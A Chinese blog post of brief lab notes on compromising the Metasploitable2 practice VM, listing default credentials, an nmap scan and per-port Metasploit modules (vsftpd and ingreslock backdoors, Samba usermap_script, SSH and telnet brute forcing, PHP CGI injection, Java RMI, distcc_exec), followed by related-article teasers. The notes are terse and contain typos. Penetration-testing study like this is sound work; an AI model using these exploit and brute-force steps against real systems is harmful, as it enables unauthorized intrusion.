metasploitable2

最新推荐文章于 2024-07-23 23:40:30 发布
最新推荐文章于 2024-07-23 23:40:30 发布
阅读量462 收藏 4
点赞数 21
文章标签: web安全 安全 网络安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62915924/article/details/138322924
版权

metasploitable2   很多漏洞的靶机

这个靶机可以自己去网上下载,可以当做入门实战的一部分


msfadmin  msfadmin 账号密码
nmap -sV -P0 IP  扫描服务 端口
use exploit/multi/samba/usermap_script 一样

21  search vsftpd   笑脸后门


set rhosts
run
whoami
ifconfig

22 search ssh_login  密码


use 0
set rhosts 
set user_flie
set pass_flie
set threads
run   可以直接可以用telnet ip 登入

23 use auxiliary/scanner/telnet/telnet_login


set rhosts 
set user_flie
set pass_flie
set threads  可以直接可以用telnet ip 登入

80


use exploit/multi/http/php_cgi_arg_injection (php漏洞)
set rhosts 
run

999


use auxiliary/scanner/smb/smb_enumshares   共享
set rhosts 

445


use auxiliary/admin/smb/samba_symlink_traversal.
set rhosts

1099  JavaScript


use exploit/multi/misc/java_rmi_server 
set rhosts 
run

1524


telnet 192.168.75.141 1524
pwd
whoami
ifconfig

3306  


use auxiliary/scanner/mysql/mysql_login 
set rhosts 
set username root   看有没有这个数据库
MySQL 192.168.75.141 -u    -p


3362


use exploit/unix/misc/distcc_exec 
set rhosts 
run

爱因斯坦95
关注
metasploitable2 渗透测试靶机 2
m0_73910867的博客
10-13 1048
metasploitable2 渗透测试靶机 2
Metasploitable 2简单使用
热门推荐
Tide的小家
12-06 1万+
密码嗅探与6667端口攻击
metasploitable2靶机
雨泽网络工作室
08-16 4906
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
靶机Metasploitable2的安装
最新发布
m0_65992344的博客
07-23 296
靶机Metasploitable2的安装
看完这篇 教你玩转渗透测试靶机——Metasploitable2
weixin_54626591的博客
07-19 625
看完这篇 教你玩转渗透测试靶机——Metasploitable2
metasploitable 2
YUKIDDDD的博客
08-05 1436
metasploitable 21.介绍2.信息收集3.漏洞利用 1.介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 2.信息收集 nmap -sC -sV -p1-65535 192.168
metasploitable2 漏洞合集学习
qq_43233085的博客
02-05 4621
metasploitable2 漏洞合集学习弱密码 Weak PasswordSamba MS-RPC Shell命令注入漏洞Vsftpd 源码包后门漏洞UnreallRCd 后门漏洞Java RMI SERVER 命令执行漏洞Root用户弱口令漏洞(SSH爆破)Distcc 后门漏洞PHP CGI 参数注入执行漏洞Druby 远程代码执行漏洞Ingreslock 后门漏洞Rlogin 后门漏洞 ...
Metasploitable2-Linux.7z
02-26
【标题】"Metasploitable2-Linux.7z" 是一个用于安全测试和教育的虚拟机镜像文件,它包含了大量的已知安全漏洞,专为渗透测试和信息安全专业人士设计。这个压缩包提供了Linux环境下的Metasploitable2平台,以便用户...
Metasploitable2-Linux.zip_believable
01-08
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。此文件是虚拟机镜像文件,可以直接在虚拟系统兼容的VMware,VirtualBox,和其他虚拟平台打开使用。默认只...
Metasploitable-2:metasploitable 2的安全审核
04-10
Metasploitable 2 配置 步骤1:下载 对于这次渗透测试,我们将使用此Metasploit实例: PS:对于我使用的实例,我们没有访问服务器的密码。 步骤2:虚拟化产品 解压缩文件 使用VMWare或VirtualBox添加VM 步骤3:虚拟...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Metasploitable2靶机渗透笔记
qq_60600840的博客
07-20 815
metaspolitable靶机、安全、渗透、靶机
metasploit实战篇之metasploitable2
weixin_43152809的博客
12-05 979
使用bee-box1.6作为目标机器 ip:192.168.3.81 首先进行扫描,收集可用的服务信息 使用nmap扫描并查看系统开放端口和相关的应用程序 nmap -sV 192.168.3.81 收集到信息后
Metasploitable2靶机渗透学习
m0_65712192的博客
05-19 6798
Metasploitable2靶机渗透学习
安装Metasploitable2
imtech的博客
01-31 2516
安装Metasploitable2
Metasploitable2使用指南
张同光 (Tongguang Zhang):Hello everyone !
04-22 1万+
http://www.freebuf.com/articles/system/34571.html Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,
Metasploitable2的相关介绍
qq_43348375的博客
03-06 644
Metasploitable2是什么? Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。 Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展为成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。 下载地址 以前提供的下载地址已经无法前往了,在这里推荐另一个地址: https://sourceforge.mirrorservice.org/m/me/metasploitable
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值